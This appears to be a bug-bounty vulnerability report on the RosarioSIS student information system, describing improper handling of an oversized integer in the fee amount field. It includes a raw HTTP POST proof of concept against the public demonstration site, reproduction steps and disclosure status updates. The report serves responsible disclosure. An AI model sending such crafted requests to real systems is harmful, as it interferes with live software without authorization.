Improper handling of large integer values in francoisjacquet/rosariosis
Valid
Reported on
May 2nd 2022
Description
In create Fee function, improper handling of large integer values in mount field value.
Proof of Concept
POST /demonstration/Modules.php?modname=Student_Billing/StudentFees.php HTTP/1.1
Host: www.rosariosis.org
Cookie: RosarioSIS=kja39eaq6q73envhk6eo8300vgumn2612c5huvue08vgh66faog1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://www.rosariosis.org/demonstration/Modules.php?modname=Student_Billing/StudentFees.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 385
Origin: https://www.rosariosis.org
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
LO_search=&month_values[14][DUE_DATE]=&day_values[14][DUE_DATE]=&year_values[14][DUE_DATE]=&values[14][COMMENTS]=&values[new][TITLE]=ased&values[new][AMOUNT]=9999999999999999999999999&month_values[new][DUE_DATE]=&day_values[new][DUE_DATE]=&year_values[new][DUE_DATE]=&values[new][COMMENTS]=&FILE_ATTACHED=
Step to reproduce
- Go to
Student Billing - Create new
Feewith amount9999999999999999999999999 - We can see server return a larger value than
9999999999999999999999999
PoC image
Impact
This vulnerability can make the website not work properly.
We are processing your report and will contact the
francoisjacquet/rosariosis
team within 24 hours.
2 years ago
A
GitHub Issue
asking the maintainers to create a
SECURITY.md exists
2 years ago
We have contacted a member of the
francoisjacquet/rosariosis
team and are waiting to hear back
2 years ago
The researcher's credibility has increased: +7
to join this conversation